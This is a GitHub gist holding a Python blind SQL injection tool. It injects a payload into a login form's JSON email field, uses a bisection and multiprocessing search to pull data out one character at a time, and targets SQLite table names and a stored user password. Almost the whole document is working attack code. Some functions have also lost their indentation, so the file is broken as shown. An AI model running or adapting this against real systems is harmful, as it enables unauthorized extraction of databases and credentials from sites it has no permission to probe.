Skip to content

Instantly share code, notes, and snippets.

@RPHAELLA
Last active January 7, 2021 09:08
Show Gist options
  • Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
Save RPHAELLA/a3a3e708653f61970a959f18dd77e915 to your computer and use it in GitHub Desktop.
# Blind SQL Injection Enumeration
# Copyright (C) 2019
#!/usr/bin/python
import sys
import re
import json
import requests
import urllib3
from itertools import repeat
from multiprocessing import Pool
# Every request is routed through a local proxy listening on 127.0.0.1:8080.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

# Certificate verification is switched off on the session below, so silence
# the warnings urllib3 emits for unverified HTTPS requests.
urllib3.disable_warnings()

# Shared HTTP session used for all probes: no TLS verification, proxy enabled.
s = requests.Session()
s.verify = False
s.proxies.update(proxies)
def _sending_payload(args, sqli, j):
    """Send one probe for candidate character code ``j``.

    ``[CHAR]`` in ``sqli`` is replaced by the candidate, the result is placed
    into ``args["payload"]`` at ``[PAYLOAD]``, and that in turn is placed into
    ``args["data_string"]`` at ``[INJECTION]`` before the request is sent.

    Args:
        args: Attack configuration. Reads the keys ``sql_type``, ``payload``,
            ``data_string``, ``method``, ``target``, ``header`` and
            ``search_term``.
        sqli: Injection expression containing the ``[CHAR]`` placeholder.
        j: Integer character code to test.

    Returns:
        ``j`` when ``args["search_term"]`` (a regular expression) is found in
        the response body, otherwise ``None``.

    Raises:
        ValueError: If ``args["method"]`` is neither ``"GET"`` nor ``"POST"``.
    """
    if args["sql_type"] == "sqlite":
        # SQLite's hex() renders upper-case, two digits per byte, and text
        # comparison is case-sensitive by default; the candidate must use the
        # same rendering or codes containing A-F never match.
        candidate = format(j, "02X")
    else:
        candidate = str(j)

    modified_sqli = sqli.replace("[CHAR]", candidate)
    payload = args["payload"].replace("[PAYLOAD]", modified_sqli)
    data_string = args["data_string"].replace("[INJECTION]", payload)

    method = args["method"]
    if method == "GET":
        r = s.get(url=args["target"], headers=args["header"], params=data_string)
    elif method == "POST":
        r = s.post(url=args["target"], headers=args["header"], data=data_string)
    else:
        # Previously this fell through and failed on an unbound response.
        raise ValueError("unsupported HTTP method: %r" % (method,))

    if re.search(args["search_term"], r.text):
        return j
    return None
def _worker_sending(args, sqli, start, end, processes=5):
    """Probe every candidate code in ``range(start, end)`` with an equality test.

    The ``[COMPARATOR]`` placeholder in ``sqli`` is set to ``=`` and one
    ``_sending_payload`` call per candidate is fanned out over a process pool
    to speed up the enumeration.

    Args:
        args: Attack configuration passed through to ``_sending_payload``.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.
        start: First candidate character code (inclusive).
        end: Last candidate character code (exclusive).
        processes: Number of worker processes in the pool (default 5).

    Returns:
        A list with one entry per candidate, in order: the candidate code if
        it matched, otherwise ``None``.
    """
    equality_sqli = sqli.replace("[COMPARATOR]", "=")
    jobs = zip(repeat(args), repeat(equality_sqli), range(start, end))
    with Pool(processes=processes) as pool:
        return pool.starmap(_sending_payload, jobs)
def _finding_optimal(args, sqli, start, end, counter, max_depth=3):
    """Narrow the candidate range with a few ``<`` probes (bisection).

    Each step asks whether the target character code is below the midpoint
    and keeps the half that must contain it.

    Args:
        args: Attack configuration passed through to ``_sending_payload``.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.
        start: Lower bound of the candidate range (inclusive).
        end: Upper bound of the candidate range (exclusive).
        counter: Number of bisection steps already performed.
        max_depth: Total number of bisection steps to perform (default 3).

    Returns:
        A ``(start, end)`` tuple describing the narrowed half-open range.
    """
    less_than_sqli = sqli.replace("[COMPARATOR]", "<")
    # "counter < max_depth" (rather than "== max_depth") also terminates when
    # the caller starts above the limit; a one-element range cannot be split.
    while counter < max_depth and end - start > 1:
        mid = start + (end - start) // 2
        if _sending_payload(args, less_than_sqli, mid) is not None:
            # Target is strictly below mid.
            end = mid
        else:
            # Target is >= mid, so mid itself is the tightest lower bound.
            start = mid
        counter += 1
    return start, end
def _optimize_attack(args, sqli):
    """Narrow the printable-ASCII range, then probe the remaining candidates.

    Args:
        args: Attack configuration passed through to the helpers.
        sqli: Injection expression containing ``[COMPARATOR]`` and ``[CHAR]``.

    Returns:
        The list returned by ``_worker_sending``: one entry per probed
        candidate, holding the matching character code or ``None``.
    """
    # The upper bound is exclusive (candidates are enumerated with
    # range(start, end)), so 127 is needed for '~' (126) to be reachable.
    start, end = _finding_optimal(args, sqli, 32, 127, 0)
    return _worker_sending(args, sqli, start, end)
'''
Set the injection comparators for payload
TO-DO: Move injection_string to allow user to define easier
'''
def _formulate_payload(args, sql_query, eof_range):
data = ""
for i in range(1, eof_range):
injection_string = "(ascii(substring(%s from %d for 1)))[COMPARATOR][CHAR]" % (sql_query, i)
if args["sql_type"] == "sqlite":
injection_string = "hex(substr((%s),%d,1))[COMPARATOR]'[CHAR]'" % (sql_query, i)
# print injection_string
output = _optimize_attack(args, injection_string)
try:
extracted_char = chr(list(filter(None.__ne__, output))[0])
sys.stdout.write(extracted_char)
sys.stdout.flush()
data += extracted_char
except:
pass
return data
def _process_payload(index, args, sql_query):
    """Extract one record: first its length, then that many characters.

    - The length is read as at most 2 characters.
    - The number of data characters read depends on the extracted length.

    Args:
        index: Record number, used only in the progress output.
        args: Attack configuration passed through to ``_formulate_payload``.
        sql_query: Sequence whose first item is the query returning the
            record's length and whose second item returns the record itself.

    Returns:
        The extracted record data, or ``""`` when the length could not be
        determined.
    """
    sys.stdout.write("\n[Record %s] Length: " % index)
    length = _formulate_payload(args, sql_query[0], 2 + 1)
    sys.stdout.flush()
    try:
        data_length = int(length)
    except ValueError:
        # Length extraction failed (empty or non-numeric); report it rather
        # than aborting the whole run with an unexplained ValueError.
        sys.stdout.write(
            "\n[Record %s] Unable to determine length (got %r)" % (index, length)
        )
        sys.stdout.flush()
        return ""
    sys.stdout.write("\n[Record %s] Data: " % index)
    return _formulate_payload(args, sql_query[1], data_length + 1)
'''
To allow single or multiple data-records enumeration
'''
def _staging_payload(type, args, sql_query):
if type == "s":
_process_payload(0, args, sql_query)
if type == "r":
sys.stdout.write("[*] Total records: ")
records = _formulate_payload(args, sql_query[0], 2+1)
sys.stdout.flush()
tmp_query = []
for i in range (0, int(records)):
tmp_query = []
for item in sql_query[1:]:
tmp_query.append(item.replace("[OFFSET]", str(i)))
_process_payload(i, args, tmp_query)
def _launch(args, context):
    """Pick the SQL queries for ``context`` and start the enumeration.

    ``"password"`` extracts a single record; ``"tables"`` extracts a counted
    series of records. Any other context returns ``None`` without sending
    anything.

    Row-selection options for the queries:
      [1] limit/**/1,1
      [2] where id=1
    """
    if context == "password":
        mode = "s"
        queries = [
            "select length(password) from users where id=1",
            "select password from users where id=1",
        ]
    elif context == "tables":
        mode = "r"
        queries = [
            "SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'",
            "SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]",
            "SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset [OFFSET]",
        ]
    else:
        return None
    return _staging_payload(mode, args, queries)
def main():
    """Build the attack configuration and enumerate the table names."""
    args = {
        "target": "",
        "method": "POST",
        "header": {"content-type": "application/json"},
        # [INJECTION] marks where the payload is placed in the request body.
        "data_string": '{"email": "[INJECTION]", "password":"\'"}',
        # [PAYLOAD] marks where the injection expression is placed.
        "payload": "' OR ([PAYLOAD]) /*",
        # Pattern searched for in the response body to decide a probe matched.
        "search_term": "authentication",
        "sql_type": "sqlite",
    }
    _launch(args, "tables")
    print("\n[+] Done!")


if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment